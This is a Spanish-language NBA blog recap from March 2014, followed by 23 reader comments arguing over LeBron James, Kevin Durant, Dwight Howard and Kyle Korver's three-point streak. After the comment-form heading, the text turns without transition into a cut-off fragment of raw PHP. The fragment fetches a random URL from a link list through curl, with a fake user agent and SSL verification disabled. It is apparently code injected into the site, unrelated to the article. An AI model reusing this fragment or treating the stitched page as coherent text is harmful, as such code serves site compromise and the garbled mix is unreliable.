La Crónica: Jornada crítica

05 de March de 2014 por TheDeerHunter

Un día después aún estamos embobados con la última exhibición de “El Elegido”. Muy épico eso de la máscara y todo lo que queramos pero cuando en los últimos minutos del partido de anoche se llevó un trastazo de Howard en el rostro fracturado a más de uno le faltó el aliento. No debemos olvidar que el hecho de que LeBron deba salir a jugar en las actuales condiciones no está exento de riesgo y seguramente lo está haciendo obligado por las circunstancias. Los campeones se están jugando mucho en este momento.

La jornada de ayer parecía venirles de cara. Un último cuarto extraordinario de Klay Thompson, con game-winner incluido a falta de 0.6s, congeló Indianapolis (98-96). No fue un partido brillante de los líderes, que se contagiaron del coqueteo con el riesgo de los Warriors. Tocaba machada y la rozaron pero acabaron llevándose la cuarta derrota en casa y rompiendo una racha de 5 victorias consecutivas. Así que estaban los Heat como para dejar descansar a James. Sin embargo, hasta un semidios sufre el cansancio. Anoche los Heat fueron un muñeco en manos de los Rockets. En realidad, sólo los errores ajenos (18 pérdidas de los locales) y la actuación portentosa de Beasley equilibraron el marcador. En condiciones normales la diferencia podría haberse ido perfectamente a los 15-20 puntos. Aún la tuvo LeBron para empatar defendido en última instancia por Howard pero no era día de triples salvadores (103-106). 

Los Heat no deben preocuparse únicamente del alto ritmo que impongan Pacers porque paralelamente se están jugando la ventaja campo en la hipotética final. Los capos del Oeste también son implacables. Palizones tanto de Thunder como de Spurs. Los primeros trituraron a los débiles Sixers con Durant en 42 puntos y Westbrook firmando un triple doble en sólo 21 minutos (92-125). En Cleveland ni la vuelta de Waiters evitó el destrozo de los Spurs. No hizo falta una gran actuación ni de Duncan ni de Parker. Danny Green, Leonard y la habitual profundidad del banco sirvieron para volver a dejar en evidencia las teóricas bondades defensivas de la pizarra de Mike Brown (122-101). Por su parte unos Clippers muy mermados por las bajas tiraron mano de sus relucientes fichajes aunque éstos aportaron poco. Partido gris de CP3 y mucho sufrimiento ante los Suns. Excelente actuación de Griffin, Barnes y Collison y victoria importantísima (104-96). Sus vecinos cayeron al último puesto de la conferencia tras perder anoche en casa frente los Pelicans (132-125). Los Lakers lo intentearon pero no pudieron parar a Anthony Davis, Tyreke Evans y compañía.

PREMIOS


MVP:
La lucha entre Kevin Durant y Lebron James por el MVP será apasionante hasta el final de temporada. Ayer, el de los Thunder respondió con 42 puntos, 9 reboes, 3 asistencias y 2 robos.

Sorpresa: Matt Barnes fue el mejor de los Clippers ante los Suns con 28 puntos y 6 rebotes y Michael Beasley de los Heat con 24 puntos. ¡Quien se lo iba a decir a ambos!

Decepción: Thaddeus Young se quedó en 6 puntos tras fallar 10 de sus 13 lanzamientos. Los mismos tiros falló Chris Paul que además perdió 5 balones.

Esfuerzo en vano: Pau Gasol sigue siendo cabeza de ratón en los actuales Lakers. Su talento le permite irse a los 29 puntos, 12 rebotes y 4 asistencias pero acumular derrota tras derrota.

Imágenes | AP Photos / Getty Images

Comenta

23 comentarios a esta entrada

  1. rumbero dice:
    #1

    13 jugadores tuvieron ayer minutos con los Spurs y…¡todos ellos dieron al menos 1 asistencia! Nunca antes visto en la NBA. Maravilloso

    Y ojito con los Rockets que llevan una racha buenísima y jugando muy bien. Ofensivamente ya venían siendo un equipo top pero es que encima han ido ajustando la defensa con el paso de los meses y empieza a ser un equipo peligroso de verdad. Y después de tantos palos que se le han dado, habrá que destacar también el mes y pico que lleva Howard recordando bastante a ese jugador de los Magic que casi teníamos olvidado. Madre mia que PO podemos tener en el oeste…

      Citar

  2. TheDeerHunter dice:
    #2

    Respecto a los Rockets discrepo puntualmente. Les vi anoche y no suelo hacerlo a menudo.
    Ayer defensivamente me pareció un equipo deseando perder el partido. La mayor parte del tiempo Howard descolocadísimo llegando tarde a las ayudas y perdiendo los rebotes defensivos correspondientes.
    No voy a negar que ha mejorado sus prestaciones respecto a Lakers, pero a mí me sigue pareciendo igual de patán. No sólo prácticamente inútil en los minutos finales (aunque se redimió con algún rebote importante y con la defensa final) sino una temeridad tenerlo en pista. Si los Heat se hubieran jugado algo estoy convencido que lo hubieran aprovechado.
    Me remito al análisis inicial del compañero. Un equipo que lo puede pasar muy mal en cuanto empiecen los playoffs.

    Por cierto… que también me preguntaba por qué Howard no lloriquea ahora por no ser el líder del equipo. Es que directamente me parece inverosímil que estando cualquiera de sus compañeros titulares al lado, especialmente Harden, y muchos de los del banco alguien se pudiera plantear darle el balón a él en los minutos calientes.

      Citar

  3. rumbero dice:
    #3

    Yo tampoco soy un asiduo de los Rockets, pero los vi contra Minny y Phoenix hace relativamente poco y si me pareció un equipo sustancialmente mejor en defensa que su versión de diciembre al que era bastante fácil ametrallar con un día un pelín bueno. Nunca va a ser su punto fuerte, pero me parece que McHale va ajustando con lo que tiene que tampoco es mucho.

    Con el amigo Howard me refería básicamente a la “regularidad” productiva que ha conseguido en el último mes, yéndose casi al 23-13. Luego si, esa cabeza y su aportación en los minutos finales, pero como dices al menos parece consciente de lo que tiene alrededor e incluso por su parte ha dejado de dar verguenza ajena en los TL para dar sólo un poco de pena.

    Por mi parte esperaba bastante menos de los Rockets, de ahí mi grata sorpresa por su rendimiento. La duda sigue estando en esos cruces que podrían tener contra ¿Warriors/Blazers? pero que pueden pelear más de lo que pensaba en un primer momento.

      Citar

  4. Jose Luis dice:
    #4

    LeBron, que llorón… argumenta que estaba “extremadamente cansado” tras el esfuerzo del día anterior. Que se hubiera dejado de career high y hubiera descansado más, que con 20 arriba seguía jugándose una y otra en el último cuarto.

      Citar

  5. Denise dice:
    #5

    Jose Luis:
    LeBron, que llorón… argumenta que estaba “extremadamente cansado” tras el esfuerzo del día anterior. Que se hubiera dejado de career high y hubiera descansado más, que con 20 arriba seguía jugándose una y otra en el último cuarto.

    Disagree.
    La NBA ademas de deporte es espectaculo y me parece cojonudo que intentase llegar lo mas lejos posible en su anotación, además sin forzar demasiados tiros. Solo falló 11 de 33 oiga!! y sin excesivos mates y florituras, casi todo tiro exterior.
    Obviamente si fuese una serie de PO, es normal que hubiera descansado, pero tratandose de simples partidos de regular season, por perder hoy no pasaba nada, y tampoco creo que los Heat hayan perdido de 3 puntos porque Lebron se jugase 40 minutos ayer.
    Cada uno tiene su opinión y obviamente respeto la tuya,. pero no entiendo por qué en vez de disfrutar de esta clase de jugadores que se ven uno cada 30 años, la gente se empeña en freirlo a críticas ó tener fobias a este tipo de jugones.

      Citar

  6. Jose Luis dice:
    #6

    Denise, pues que no diga después que estaba muy cansado para justificar la derrota xD

    Si estaba cansado fue porque se empeñó en cansarse, no por otra cosa. Podía haber descansado mucho tiempo, pero quiso anotar y anotar. Si hoy te pasa factura, si quieres dilo, pero no justifiques la derrota.

    Vamos, encima quedará como mártir “es que por dar espectáculo no descansé y por eso perdí hoy” xD

    En la segunda parte vs Rockets, 1 de 7 en tiros, 1 solo rebote. Yo creo que sí le influyó la minutada del dia anterior buscando un career high en un partido más que ganado desde el minuto 30.

      Citar

  7. Ruxixon dice:
    #7

    Probablemente haya influido el jugar la noche anterior y el viaje posterior,a nivel defensivo no parecían tan finos,apartado este que es donde se ha cimentado esa mejora de los Heat tras el All Star.Una derrota de las que se podían esperar no obstante.A Houston hay algo que le mata y es lo poca inteligencia de sus jugadores cuando las cosas aprietan,la jugada final donde Harden no es capaz de salir botando el balón y le lanza el melonazo a Howard -que derivó en el golpe que se cita en la crónica de Deer- es el ejemplo,viniendo además del jugador franquicia.Ahora en RS no pasa nada,pero en PO estas cosas te matan.

      Citar

  8. HisRoyalAirness dice:
    #8

    A lo mejor también os estáis olvidando de que no es lo mismo jugar contra Houston que contra los Bobcats, que si están en playoffs es sólo por la penuria que es el Este.
    Ayer veía mucha chorrada en internet sobre los 61 puntos…que sí, que está muy bien, pero es en RS y contra un equipo en el que no defiende ni el tato. Todo tiro exterior? La mitad fueron penetraciones ante un nulo juego interior. Y no me llaméis hater que creo que es el mejor de la liga de lejos pero las cosas como son

      Citar

  9. Denise dice:
    #9

    HisRoyalAirness:
    A lo mejor también os estáis olvidando de que no es lo mismo jugar contra Houston que contra los Bobcats, que si están en playoffs es sólo por la penuria que es el Este.
    Ayer veía mucha chorrada en internet sobre los 61 puntos…que sí, que está muy bien, pero es en RS y contra un equipo en el que no defiende ni el tato. Todo tiro exterior? La mitad fueron penetraciones ante un nulo juego interior. Y no me llaméis hater que creo que es el mejor de la liga de lejos pero las cosas como son

    WTF?? Charlotte es el 5º equipo de toda la competición que menos puntos encaja, por lo que digo yo que su defensa tendrá algo que ver.
    Si Lebron quisiera (y Miami le diese 30 tiros), Lebron anotaría 45-50 puntos con la gorra cada noche, sea a equipos del Este como del Oeste. Y no reconocer el mérito de lo de anoche me parece de hater conuna venda en los ojos.

      Citar

  10. Denise dice:
    #10

    Denise: WTF?? Charlotte es el 5º equipo de toda la competición que menos puntos encaja, por lo que digo yo que su defensa tendrá algo que ver.
    Si Lebron quisiera (y Miami le diese 30 tiros), Lebron anotaría 45-50 puntos con la gorra cada noche, sea a equipos del Este como del Oeste. Y no reconocer el mérito de lo de anoche me parece de hater conuna venda en los ojos.

    Precisamente, a equipos de PO del Oeste con los que ya ha jugado sus 2 partidos esta temporada, sus números son:
    – Oklahoma 2 partidos: 33’5 puntos de media, con 21 tiros y un 64’3% de acierto en tiros de campo;
    – Phoenix: 36 puntos de media con 18 tiros!! y un 63’9% en TC;
    – Dallas: 40’5 puntos de media, 20’5 tiros y un 73’2%
    – Clippers: 24,5 puntos, 16’5 tiros y 51’5%
    – Golden State: 31 puntos, 21 tiros y 57’1%

    Lebron James, MVP indiscutiblemente

      Citar

  11. HisRoyalAirness dice:
    #11

    Bueno Denise, veo que ya te contestas a ti mismo. Lo de que son quintos en defensa ya lo sabia y llevan cacareándolo en la prensa yanki 2 días, pero digo que yo vi el partido y si hubiese un pivot serio por ahí esas penetraciones iban a ser menos.
    MVP indiscutiblemente? Porque lo digas tú. Durant anota y rebotea más, promedia sólo 0’9 asistencias menos y tuvo a su equipo primero EN EL OESTE sin Westbrook hasta ahora. Indiscutible? Respetuosamente discrepo. Si quieres repasamos la plantilla de Oklahoma y la de los Heat y sus conferenciaa y vemos quién tiene más mérito también. Es jugador más valioso, no mejor jugador o más completo

      Citar

  12. Denise dice:
    #12

    HisRoyalAirness:
    Bueno Denise, veo que ya te contestas a ti mismo. Lo de que son quintos en defensa ya lo sabia y llevan cacareándolo en la prensa yanki 2 días, pero digo que yo vi el partido y si hubiese un pivot serio por ahí esas penetraciones iban a ser menos.
    MVP indiscutiblemente? Porque lo digas tú. Durant anota y rebotea más, promedia sólo 0’9 asistencias menos y tuvo a su equipo primero EN EL OESTE sin Westbrook hasta ahora. Indiscutible? Respetuosamente discrepo. Si quieres repasamos la plantilla de Oklahoma y la de los Heat y sus conferenciaa y vemos quién tiene más mérito también. Es jugador más valioso, no mejor jugador o más completo

    Bueno, yo no vi el partido, pero los Bobcats si que tienen un pivot serio, y tanto!!, Al Jefferson, posiblemente el mejor pivot del mundo en cuanto a estado de forma actual. y que se cascó en ese partido 38 puntos y 19 rebotes.
    Respecto al MVP, yo se lo daría a Lebron, pero si se lo lleva Durant pues tambien se lo merece. Al fin y al cabo, siempre me ha parecido mas importante el MVP de las finales (que significa que ademas te has llevado un anillo a casa) que el de la regular.

      Citar

  13. Jose Luis dice:
    #13

    Yo creo que tener la 5º o 6ª mejor defensa también es fruto de enfrentarse a pestes dia tras día en la conferencia Este, a jugar a un ritmo lento, y demás.

    Son el 4º equipo que menos puntos anota, fruto de ese ritmo lento también.

      Citar

  14. HisRoyalAirness dice:
    #14

    Jose Luis:
    Yo creo que tener la 5º o 6ª mejor defensa también es fruto de enfrentarse a pestes dia tras día en la conferencia Este, a jugar a un ritmo lento, y demás.

    Son el 4º equipo que menos puntos anota, fruto de ese ritmo lento también.

    Gracias.

    Y sí, Al Jefferson en defensa es Olajuwon poco menos

      Citar

  15. Jose Luis dice:
    #15

    HisRoyalAirness: Gracias.

    Y sí, Al Jefferson en defensa es Olajuwon poco menos

    Bill Russell diría

      Citar

  16. HisRoyalAirness dice:
    #16

    Jose Luis: Bill Russell diría

    Aún acabo de leer unos tweets de Dominique de ayer que decía que la defensa había sido un bochorno

      Citar

  17. Sancho88 dice:
    #17

    Fin del record de Korver. Quedan 8 minutos y no creo que le saquen más. Su 0/5 pone el fin

      Citar

  18. Sancho88 dice:
    #18

    127 triples consecutivos. Hasta aquí ha llegado Kyle Korver. Muchos decían que su record estaba lastrando al equipo, que siempre quería meter su triple y tal, pero realmente sus porcentajes no eran malos. Ahora habrá que buscar otro culpable a la penosa racha de los Hawks. Realmente para ser objetivos jugar sin Horford ni Millsap es el culpable de las derrotas. Por otra parte, el entrenador de los Hawks podía haber sacado en el último cuarto a Korver. Creo que era un record muy bonito y ahora nos quedamos sin un buen aliciente para vernos los resúmenes. No sé, vosotros qué opináis?

      Citar

  19. Sancho88 dice:
    #19

    Creo que ahora los ojos están puestos en Stephen Curry. 50 partidos consecutivos anotando un triple. Su racha actual empezó el 18 de noviembre contra los Jazz. Está a 77 partidos de superar a Kyle Korver. Ojalá lo consiga, este record mola bastante, jjeje

      Citar

  20. Denise dice:
    #20

    Pues si señores, la defensa de los Bobcats es una castaña y acaban de pegar una paliza a los Pacers, dejarlos en 87 puntos y a Paul George en 0-9. Y Jefferson, bffff vaya bluff, es peor que Robert Swift…solo ha podido hacerlo un 34-8 a Indiana.

    Si alguien ha visto el partido, me gustaría saber quien ha defendido a George, porque Gilchrist ha jugado muy poco.

      Citar

  21. Jose Luis dice:
    #21

    Denise, no decimos que Jefferson sea malo, pero lo peor que tiene es su defensa, y su intimidación es nula xD

    Ofensivamente es de lo mejor que hay, quizá el mejor ahora que Bynum decidió echarse a perder.

      Citar

  22. rumbero dice:
    #22

    Denise:
    Pues si señores, la defensa de los Bobcats es una castaña y acaban de pegar una paliza a los Pacers, dejarlos en 87 puntos y a Paul George en 0-9. Y Jefferson, bffff vaya bluff, es peor que Robert Swift…solo ha podido hacerlo un 34-8 a Indiana.

    Si alguien ha visto el partido, me gustaría saber quien ha defendido a George, porque Gilchrist ha jugado muy poco.

    MKG estuvo más que bien sobre George pero se cargó rápido de faltas y tuvo que salir al rescate el gran Trolliver. Sin quitar méritos a la defensa de los Bobcats, la ofensiva de los Pacers viene bajando prestaciones y George está bastante lejos de su versión de inicio de temporada. De seguir así les va a costar el primer puesto del este.

      Citar

  23. Jose Luis dice:
    #23

    Los Pacers están sufriendo un buen bache desde hace mes o mes y medio… o vuelven a reencontrarse con su forma más competitiva, o lo tienen muy complicado para mantener ese primer puesto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>